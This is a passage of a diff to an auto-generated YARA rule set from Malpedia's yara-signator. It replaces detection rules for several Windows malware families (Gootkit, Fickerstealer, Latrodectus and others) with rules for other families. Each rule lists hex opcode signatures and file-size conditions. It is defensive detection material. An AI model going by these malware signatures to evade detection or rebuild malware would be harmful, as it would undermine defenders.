+		$sequence_8 = { e8???????? 68???????? e8???????? e8???????? 6a01 e8???????? }
+		$sequence_9 = { 6a01 6a06 8d45dc 50 }
 
 	condition:
-		7 of them and filesize < 1196032
+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Agfspy_Auto : FILE
+rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10a5651b-99ec-562f-82a5-e11489c17110"
+		id = "0fa71a6d-0c80-54bf-8699-93451280ec8a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agfspy_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fuwuqidrama_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "2e86502162b077190fa9b6bc0039b0226221ca91b45f721fc1b45981eaf2202d"
+		logic_hash = "01914df1a3041b58ec9ceec9faa5307c8556d20ec25933ac048149432128c635"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100423,32 +100434,32 @@ rule MALPEDIA_Win_Agfspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b01 6a01 ff10 c645fc05 8bce 8b07 66c745e00100 }
-		$sequence_1 = { 745e 33c0 663b07 7457 50 50 50 }
-		$sequence_2 = { 03c0 03c7 83d600 3b5ddc 736e 8b55e4 ebaa }
-		$sequence_3 = { 8d4dd8 e8???????? 0f1005???????? 8bd0 c745e82e000000 c745ec2f000000 8955d8 }
-		$sequence_4 = { 25ff000000 740e 83f807 0f8557020000 e9???????? c745e400000000 }
-		$sequence_5 = { 64a300000000 894dc8 8b7508 8b7d0c 8bcf 8975d0 8b4608 }
-		$sequence_6 = { bb04000000 895de4 eb28 4e eba8 8b17 8b4a04 }
-		$sequence_7 = { 56 ff15???????? 33f6 8b9564ffffff 83fa10 722b 8b8d50ffffff }
-		$sequence_8 = { 3bcf 0f820a020000 8b55ec 8bc2 2bc1 83f801 }
-		$sequence_9 = { 75ed eb7c 83f85c 7403 50 eb6d 3bf9 }
+		$sequence_0 = { 8d8eac040000 c744242813000000 e8???????? 8b86a4040000 8dbea0040000 50 c644242c12 }
+		$sequence_1 = { 33ee 8b742418 33ee 8bdf 036908 }
+		$sequence_2 = { 85f6 57 8be9 0f8483000000 8b7c241c 85ff 7461 }
+		$sequence_3 = { 8964241c 50 e8???????? 8b742430 8d4c2424 51 8bce }
+		$sequence_4 = { 8b742410 85f6 765b 8bce 8bb424a4000000 8bc1 8d7c241c }
+		$sequence_5 = { 8944241c 89542418 0f8cadfeffff 55 e8???????? 83c404 5f }
+		$sequence_6 = { e8???????? 8b442418 46 3bf0 0f8c57ffffff 8b85c0000000 6a04 }
+		$sequence_7 = { 746d 8b542410 8b442444 8d4c244c 6a00 51 }
+		$sequence_8 = { 8b8424f8040000 8d8c24d0010000 50 c78424f404000000000000 e8???????? }
+		$sequence_9 = { 899708140000 898704140000 ff15???????? 8b16 8d4704 6a00 50 }
 
 	condition:
-		7 of them and filesize < 1482752
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Vmzeus_Auto : FILE
+rule MALPEDIA_Win_Unidentified_110_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66c6a017-6d01-5f54-977c-810778bd36c9"
+		id = "de50c299-8c19-5206-82ae-12d89e1364a2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vmzeus_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_110_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "21af12598bbe8c129f701b1173aa31044d5a02d195bccea2272138762380a86c"
+		logic_hash = "7703e37b095cb10c8692d1e0e6db116fd89428e35c2b0f841b802fc9c40d7edf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100462,32 +100473,32 @@ rule MALPEDIA_Win_Vmzeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8901 b001 c3 55 8bec 81ec08010000 53 }
-		$sequence_1 = { e9???????? 32c0 6a4c 8d7c242c }
-		$sequence_2 = { 7508 6a04 58 e9???????? 32c0 6a4c }
-		$sequence_3 = { f3a4 b001 eb02 32c0 }
-		$sequence_4 = { 6a10 32c0 59 8bfb f3aa }
-		$sequence_5 = { 57 6a44 5a 32c0 8bca }
-		$sequence_6 = { 8901 b001 c3 55 8bec 81ec08010000 }
-		$sequence_7 = { 6a10 32c0 59 8bfb }
-		$sequence_8 = { 7508 6a04 58 e9???????? 32c0 6a4c 8d7c242c }
-		$sequence_9 = { 6a04 58 e9???????? 32c0 6a4c 8d7c242c 59 }
+		$sequence_0 = { 4c8d05f8f80f00 e8???????? 4889c1 488d542460 e8???????? 84c0 0f850a010000 }
+		$sequence_1 = { 7405 b801000000 4883c428 c3 4883ec48 488d0595590d00 4889442430 }
+		$sequence_2 = { eb0d 4c8d055c100f00 4889f1 4c89fa e8???????? 0f0b 4c8d0560100f00 }
+		$sequence_3 = { 48898c2440050000 0fb7842496070000 4889842448050000 48c1e020 4809c8 4889842438050000 8b842498070000 }
+		$sequence_4 = { 8b8424b0020000 898424bc020000 8b8424a0020000 898424ac020000 8b8424a4020000 898424b0020000 8b84248c020000 }
+		$sequence_5 = { 498d7c2401 488b7500 488b4e40 41b601 b800000000 4885c9 759a }
+		$sequence_6 = { 48d3ee 4489f9 e8???????? 21f0 418906 428d043b 894708 }
+		$sequence_7 = { f049834e4001 4883a4242802000000 498d7618 4889f1 e8???????? 4d8b7e10 41f6c701 }
+		$sequence_8 = { 492b442410 48ffcd 4821c5 31ff 4c8d35382d0f00 488b5c2478 4839fd }
+		$sequence_9 = { ba04000000 e8???????? 832000 66c740040200 6644897806 896808 4883600c00 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 3217408
 }
-rule MALPEDIA_Win_Nitlove_Auto : FILE
+rule MALPEDIA_Win_Moonwalk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0d01298-0d5a-55f1-9d4e-e8ef0815c02e"
+		id = "fd39fa26-9d1a-515b-b730-f6f9e30e5941"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitlove_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonwalk_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "39f2491a6c684fee2e407b59de9df647d75dd52440711335af5e0d5784c94ebd"
+		logic_hash = "1c19a679d272620c40c7a55b8a8c2eabaee5ff1d6dffe1b79863d345d92546d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100501,32 +100512,32 @@ rule MALPEDIA_Win_Nitlove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 8d85c4fdffff baeb9b12fe 50 }
-		$sequence_1 = { 50 8bd6 e8???????? ffd0 83c40c 8d85fcfcffff }
-		$sequence_2 = { ba8be20580 b9???????? e8???????? ffd0 85f6 7451 }
-		$sequence_3 = { ffd0 8b45d0 85c0 7452 8b75fc 897ddc 2bf7 }
-		$sequence_4 = { 7d07 46 8bfe 3bf3 }
-		$sequence_5 = { e8???????? ffd0 8b15???????? 8bf0 8d45fc }
-		$sequence_6 = { 56 57 8d859cfeffff c745a444000000 68???????? 50 baeb9b12fe }
-		$sequence_7 = { 83f80e 7c43 8d4d08 e8???????? }
-		$sequence_8 = { ebeb 0fb64608 48 740c 48 740c }
-		$sequence_9 = { 8955fc 8b473c 8b443878 03c7 8b481c 03cf 894dec }
+		$sequence_0 = { 660f1f840000000000 488b03 483301 0f85ce000000 4883c308 4883c108 493bdf }
+		$sequence_1 = { c3 4038ac24a0000000 0f854dffffff 488b4330 8b4804 398c24a4000000 }
+		$sequence_2 = { 0fb6d1 418bca c1e908 458bc2 49c1e818 428b9c8030260100 339c90303a0100 }
+		$sequence_3 = { 7541 488d8538010000 89bd38010000 33d2 4889442420 488b05???????? }
+		$sequence_4 = { 488b4008 488905???????? 488d4db0 48894548 e8???????? 85c0 0f8898010000 }
+		$sequence_5 = { 304304 488b442448 0fb60408 304305 488b442450 0fb60408 304306 }
+		$sequence_6 = { 0fb60408 30430f 488b45a0 0fb60408 304310 488b45a8 0fb60408 }
+		$sequence_7 = { 488b4858 488d4580 48894578 48894d50 4c896d70 48899d80000000 }
+		$sequence_8 = { 0fb603 48ffc3 4403c0 493bd9 0f835a020000 3dff000000 74e7 }
+		$sequence_9 = { c3 48895c2408 4889742410 57 4881ec90000000 488b4210 488bd9 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 179200
 }
-rule MALPEDIA_Win_Cloudeye_Auto : FILE
+rule MALPEDIA_Win_Latrodectus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44608db0-2b3b-55a4-82c4-1c5317afcfea"
+		id = "02322cd8-96f0-5b56-94f1-88df3945f27c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudeye_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.latrodectus_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "54d2e3ccac7509c285f63d14127016b59266a9af9b4d7112de2a7058fc6a0ca1"
+		logic_hash = "91b2f62d96756249c5bc2116ba49c8b0c1df538f3c82f3888f308bd5e8fea475"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100540,32 +100551,32 @@ rule MALPEDIA_Win_Cloudeye_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 64ff35c0000000 8f4548 c3 60 b055 }
-		$sequence_1 = { c70010000100 80fc8b ffb700500000 39c9 6afe ff5528 }
-		$sequence_2 = { 85da 8b4d18 bafee5190e e8???????? }
-		$sequence_3 = { 7570 206b65 7900 e8???????? 53 }
-		$sequence_4 = { ff50e0 6639d1 61 b8ffffffff }
-		$sequence_5 = { 83f800 0f8598000000 6685c1 8b4d20 81c100410000 c70107000100 51 }
-		$sequence_6 = { 81c29c000000 52 6a07 6aff 38ed 50 e8???????? }
-		$sequence_7 = { 5b 6685da 31c0 83c004 }
-		$sequence_8 = { 8bb714080000 38ef 8b8700080000 01f0 01c8 }
-		$sequence_9 = { 85db 837d7401 750a e8???????? 83f801 7405 }
+		$sequence_0 = { 8b442420 4883c002 488bc8 e8???????? 4889442428 }
+		$sequence_1 = { 4889842438010000 4c8d442430 488b942430010000 488b8c2438010000 }
+		$sequence_2 = { 85c0 742b e8???????? 85c0 7422 e8???????? }
+		$sequence_3 = { 4c8b8c24a0000000 450fb74904 6641c1c908 450fb7c9 4c8b9424a0000000 450fb712 6641c1ca08 }
+		$sequence_4 = { ff15???????? 8b4c2420 0fafc8 8bc1 89442424 8b4c2424 }
+		$sequence_5 = { ba50020000 488d8c2490000000 e8???????? 488d942490000000 488b4c2420 ff15???????? 4889442430 }
+		$sequence_6 = { eb31 8b442448 8bd0 488b442440 488b08 e8???????? }
+		$sequence_7 = { eb1e 488b8424b8000000 8b4c2444 8908 488b8424c8000000 0fb74c2454 668908 }
+		$sequence_8 = { 488b442430 8b401c 488b4c2470 4803c8 488bc1 488b4c2450 }
+		$sequence_9 = { 8b442428 390424 732f 8b442408 c1e808 8b0c24 488b542420 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 173056
 }
-rule MALPEDIA_Win_Fickerstealer_Auto : FILE
+rule MALPEDIA_Win_Chinoxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f6a3748-f0ba-5d54-bc6b-9a386da9e8f6"
+		id = "42e4e8ac-898e-5ba1-b0d0-68925d7ec424"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fickerstealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinoxy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "0126c62412dad879a43e44f06017fe0625a540d4c54a2a3f5410236702fb1a45"
+		logic_hash = "1545d921096fb73521705c66429b51a5fc0ae5b2cfe48972524e78dbe1d3ae8e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100579,32 +100590,32 @@ rule MALPEDIA_Win_Fickerstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff500c 83c40c 84c0 0f85fe000000 8b45f0 8945cc 8975d0 }
-		$sequence_1 = { ebb7 e8???????? 89c1 8945ec 6a02 58 31d2 }
-		$sequence_2 = { f20f104c2420 31d2 895c2470 890c24 894c2474 898424f0000000 8b442428 }
-		$sequence_3 = { 8b4508 c7400cffffff7f 834808ff 834804ff 8308ff 5d c3 }
-		$sequence_4 = { 31cb 234c2404 21df 231c24 31f8 89fa 8b7c2408 }
-		$sequence_5 = { f20f114e0c 895614 eb12 8365e400 8d4de4 e8???????? 8b45f0 }
-		$sequence_6 = { d3e8 31db 80c518 43 21d8 c1e008 09d0 }
-		$sequence_7 = { 56 83ec10 8b7d0c 8b4514 8b4d10 8b7508 8b5d18 }
-		$sequence_8 = { f20f114610 f20f114e08 f20f1116 56 e8???????? 59 83c418 }
-		$sequence_9 = { c1e00f 09f8 c1e107 0fb6f9 8b4de8 09f8 89df }
+		$sequence_0 = { 8bce 43 8d041b 50 e8???????? 85c0 89442428 }
+		$sequence_1 = { 83c8ff 5b c3 33c0 85ff 7628 8a0c30 }
+		$sequence_2 = { 8bf8 85ff 0f849c000000 68???????? }
+		$sequence_3 = { 83bf3420000005 753a e9???????? 68e8030000 8bcf e8???????? 8b44241c }
+		$sequence_4 = { 8bf1 57 c7442408???????? 8dbee0010000 85ff 897c240c 740a }
+		$sequence_5 = { 8d0498 85ff 8928 7427 ff4e08 eb1b 3b5e18 }
+		$sequence_6 = { ff15???????? 8b4c2410 8bc7 5f 5e 64890d00000000 }
+		$sequence_7 = { 8d8ec8020000 e8???????? 8d86d4020000 8b4c240c 894004 894008 c700???????? }
+		$sequence_8 = { 8bf9 897c2408 8d470c c7470400000000 50 }
+		$sequence_9 = { 6aff 6a00 6a00 6a00 6a00 6a00 6a00 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 1138688
 }
-rule MALPEDIA_Win_Rambo_Auto : FILE
+rule MALPEDIA_Win_Ground_Peony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f18152a-df9c-5933-beb1-7d48427107b5"
+		id = "a6ba3822-837c-5f9f-87da-bacc2e30de24"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rambo_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ground_peony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ground_peony_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "43a3f5e58cc73b887b9d9425ae48fd61511eb3413bc03e0babb322fa4b593a9b"
+		logic_hash = "e78f90db6174b77e8191ffdbebceb8195c536d4827a66bc4c3081db996009605"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100618,40 +100629,34 @@ rule MALPEDIA_Win_Rambo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 745e 57 6a02 6a00 56 }
-		$sequence_1 = { ff15???????? 8bf0 83c420 85f6 7437 }
-		$sequence_2 = { 83c428 6a32 ff15???????? 8d85f8faffff 50 }
-		$sequence_3 = { 57 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 }
-		$sequence_4 = { e8???????? 8065fe00 8d45fc 50 8d85f8feffff 50 c645fc72 }
-		$sequence_5 = { 8d85f0feffff 50 8d85ecfdffff 50 e8???????? ff750c 8d85ecfdffff }
-		$sequence_6 = { 7437 56 6a01 ff7508 e8???????? 59 50 }
-		$sequence_7 = { 8d85fcfeffff 59 50 ff15???????? 33c0 c9 }
-		$sequence_8 = { c68424000400000b e8???????? 8d4c2424 8d542420 51 8d442414 }
-		$sequence_9 = { 8dbc24ec000000 be???????? f3ab b906000000 8dbc24d0000000 f3a5 6804010000 }
-		$sequence_10 = { e8???????? 50 8d4c2428 c68424040400000a e8???????? }
-		$sequence_11 = { e8???????? 8d4c2464 c684240004000001 e8???????? }
-		$sequence_12 = { 33c9 89542474 894c245c 8d542474 }
-		$sequence_13 = { 8d4c241c c68424000400000f e8???????? 8d8c249c000000 }
-		$sequence_14 = { 8b430d 84c9 7403 50 ffd5 8a4b04 }
-		$sequence_15 = { aa ff15???????? 8b4c2408 8d54240c 50 }
+		$sequence_0 = { 4883c308 488d0544f60000 483bd8 75d8 }
+		$sequence_1 = { e9???????? 488d0518d00000 4a8b04e8 42f644f83840 7405 803f1a 741f }
+		$sequence_2 = { 3b1d???????? 736b 488bc3 488bf3 48c1fe06 4c8d2d36d30000 83e03f }
+		$sequence_3 = { 4883ec20 488bf9 4c8d0d74970000 b904000000 4c8d0560970000 488d1561970000 e8???????? }
+		$sequence_4 = { 57 4156 4881ec30090000 488b05???????? 4833c4 4889842420090000 }
+		$sequence_5 = { ff15???????? 488bc7 488b8c2450010000 4833cc e8???????? 488b9c2470010000 4881c460010000 }
+		$sequence_6 = { 4883c428 c3 488d15878e0000 488d0d808d0000 }
+		$sequence_7 = { 488be9 4c8d0503710000 488d1504710000 b914000000 e8???????? }
+		$sequence_8 = { 4053 4883ec20 33db 488d15e1350100 4533c0 }
+		$sequence_9 = { 488b5c2430 4883c420 5f c3 48897c2408 488d3da0f60000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Gootkit_Auto : FILE
+rule MALPEDIA_Win_Kutaki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3a6e6c9-1219-5f09-a9d1-18bdb3a0aef0"
+		id = "3c87fe1d-05a9-5edb-bd70-90267ed2d35f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gootkit_auto.yar#L1-L333"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kutaki_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "07bd7f30e8bca19c8b0b8ce140e27e4d72a01335eb0ac2905d18ed037638c9b8"
+		logic_hash = "f474749c1cd094eae743101c28ca84cb1920c476698848136df3aa022b49d368"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100663,59 +100668,32 @@ rule MALPEDIA_Win_Gootkit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec30 53 8bc1 0f57c0 56 57 8d4df8 }
-		$sequence_1 = { 833b00 7406 837b0400 7502 }
-		$sequence_2 = { 7407 33c9 e8???????? 8b5dfc ff75f4 6a00 ff15???????? }
-		$sequence_3 = { 6a02 5b 8975f0 e8???????? 8d45fc 33d2 }
-		$sequence_4 = { 59 85c0 0f84af000000 2bc6 8bce 8bd0 e8???????? }
-		$sequence_5 = { 51 8bcb e8???????? 59 85c0 740c }
-		$sequence_6 = { ff15???????? 50 ffd6 8bc7 893d???????? }
-		$sequence_7 = { 55 8bec 83ec14 53 57 8955f4 8bd9 }
-		$sequence_8 = { f3aa 68???????? ff15???????? 50 }
-		$sequence_9 = { 8b7df4 32c0 8b4de4 f3aa }
-		$sequence_10 = { 50 68???????? ff15???????? 85c0 7505 e8???????? }
-		$sequence_11 = { 50 e8???????? 83c40c 68fd000000 }
-		$sequence_12 = { 50 8b4508 8b00 99 52 50 }
-		$sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d c3 55 }
-		$sequence_14 = { 833d????????00 750a 6a32 ff15???????? }
-		$sequence_15 = { e8???????? 6a0c 6a08 ff15???????? }
-		$sequence_16 = { 6808020000 6a00 ff15???????? 50 ff15???????? }
-		$sequence_17 = { 6a02 ff15???????? 6888130000 ff15???????? }
-		$sequence_18 = { 8d45fc 50 6a01 6a01 6a00 6800000002 }
-		$sequence_19 = { e8???????? 85c0 750c c705????????03000000 }
-		$sequence_20 = { e8???????? 85c0 740d 6810270000 }
-		$sequence_21 = { 68???????? 51 51 ff15???????? 50 }
-		$sequence_22 = { 53 53 53 8901 }
-		$sequence_23 = { 83faff 7508 ff15???????? 8bd0 }
-		$sequence_24 = { ff15???????? ffc3 83fb0a 7cd5 33c0 }
-		$sequence_25 = { 7550 ff15???????? 8bf8 893d???????? }
-		$sequence_26 = { 8d4204 3bc8 7344 2bca }
-		$sequence_27 = { 0f104850 0f114f50 0f104060 0f114760 8b4070 894770 }
-		$sequence_28 = { 8bf2 8d4601 57 50 }
-		$sequence_29 = { 8b8de4fdffff 8b36 85f6 75a2 8b3f }
-		$sequence_30 = { 53 33db e8???????? ff15???????? 8bc8 }
-		$sequence_31 = { 0f104010 0f110f 0f104820 0f114710 }
-		$sequence_32 = { 3cff 7552 807e0125 754c 8b5e02 }
-		$sequence_33 = { ff15???????? 85c0 7510 8d4864 ff15???????? }
-		$sequence_34 = { 0f104050 0f114f40 0f104860 0f114750 }
-		$sequence_35 = { 0f114710 0f104030 0f114f20 0f104840 0f114730 0f104050 0f114f40 }
-		$sequence_36 = { 7323 8b33 eb19 3ce9 7508 8b4601 83c605 }
+		$sequence_0 = { 8d4de8 51 56 ff503c 3bc7 7d0f 6a3c }
+		$sequence_1 = { 898598feffff 83bd98feffff00 7d26 68a0000000 68???????? 8b859cfeffff 50 }
+		$sequence_2 = { 8b4db8 51 ff15???????? 898540ffffff eb0a c78540ffffff00000000 8b55d8 }
+		$sequence_3 = { 8b8db8feffff 51 ff90a0000000 dbe2 8985b4feffff 83bdb4feffff00 }
+		$sequence_4 = { 8d953cffffff 52 6808200000 ff15???????? 898564feffff 8d8564feffff 50 }
+		$sequence_5 = { 51 8d45d8 52 50 ff15???????? 50 e8???????? }
+		$sequence_6 = { 8b45c8 898558ffffff c745c800000000 8b9558ffffff 8d4dcc ff15???????? c745fc30000000 }
+		$sequence_7 = { 57 50 ff15???????? 8d55c4 8d45c8 52 50 }
+		$sequence_8 = { 8b95d0feffff 52 8b85ccfeffff 50 ff15???????? 89853cfeffff eb0a }
+		$sequence_9 = { 8d9578ffffff 52 ff15???????? 83c420 50 8d8568ffffff }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 1335296
 }
-rule MALPEDIA_Win_Byeby_Auto : FILE
+rule MALPEDIA_Win_Rifdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9611b4e7-8337-551b-9691-e65f61744e7f"
+		id = "499aaa99-f413-5777-add2-b3ffc4ab58b2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.byeby_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rifdoor_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "50a28d5ba51c4cf2da918fb2e13d81e48eb5727c5e9589337c757040c753f599"
+		logic_hash = "238633b85866a846f2bb6c165a492790b5a2e2a57ade12fcf4d261ecd5fc10cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100729,34 +100707,40 @@ rule MALPEDIA_Win_Byeby_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0c befdffffff eb05 befeffffff }
-		$sequence_1 = { 8907 ff15???????? 40 8d8c243f0a0000 034c241c 8d7f04 03f0 }
-		$sequence_2 = { 741a 6a00 8bc7 2bc6 50 8b44241c 03c6 }
-		$sequence_3 = { c745e400000000 85c9 7404 33ff eb03 8d7e48 }
-		$sequence_4 = { ff15???????? 8b35???????? 8d84243c060000 50 8d8424380a0000 50 ffd6 }
-		$sequence_5 = { 80bc05e7feffff5c 7411 8d85e8feffff 50 ffd6 }
-		$sequence_6 = { 50 57 ff15???????? 85c0 7461 8d642400 }
-		$sequence_7 = { 8d85a8feffff 50 8d8584fcffff 50 6a00 }
-		$sequence_8 = { 0fbec2 0fb680d0450110 83e00f eb02 33c0 8bbdc8fdffff 6bc009 }
-		$sequence_9 = { 57 ff15???????? 85c0 0f84f6010000 8b542418 03542414 }
+		$sequence_0 = { 8d4318 b9???????? 895c2414 e8???????? }
+		$sequence_1 = { 395c2414 7529 395c2418 7523 }
+		$sequence_2 = { 8b15???????? 83c408 6a00 6a12 8d4c240c 51 }
+		$sequence_3 = { 40 0080a640008a 46 0323 }
+		$sequence_4 = { 8b542414 8bf8 52 57 e8???????? 83c40c }
+		$sequence_5 = { 83c40c 6bc930 8975e0 8db1304b4100 }
+		$sequence_6 = { 33dd c1e311 c1e808 0bc3 }
+		$sequence_7 = { ffd6 a3???????? 895c2410 8d4c2410 51 8d4310 }
+		$sequence_8 = { 8d95e8fbffff 52 ff15???????? 8d85e8fbffff 50 8bc8 51 }
+		$sequence_9 = { c745e888130000 ff15???????? 8bc6 8b4dfc 5f 33cd 5e }
+		$sequence_10 = { 46 8935???????? e9???????? 5f }
+		$sequence_11 = { 59 83f83c 762a 56 e8???????? 8d0445bc124100 }
+		$sequence_12 = { 51 8d9574fcffff 52 6a00 6a00 56 50 }
+		$sequence_13 = { 83ffff 0f84bb000000 53 53 8d95f4f7ffff 52 }
+		$sequence_14 = { 51 56 89b5f4feffff ffd7 85c0 7413 5f }
+		$sequence_15 = { 53 57 8d858cf8ffff 50 8d8d24ffffff }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Stabuniq_Auto : FILE
+rule MALPEDIA_Win_Synccrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aceb592e-d7b5-5f4a-8a9e-1d7eba65be7f"
+		id = "c0acfe97-1049-5df6-8be2-e1920c7563c7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stabuniq_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.synccrypt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8abe8b1e5433d79ecca06d79534ec6148ee9460e9d28a8041508dc1cd6d954c1"
+		logic_hash = "36fed86930a547a043d213272378804045281c22493a08490f720ea6d556929c"
 		score = 75
-		quality = 75
+		quality = 45
 		tags = "FILE"
 		version = "1"
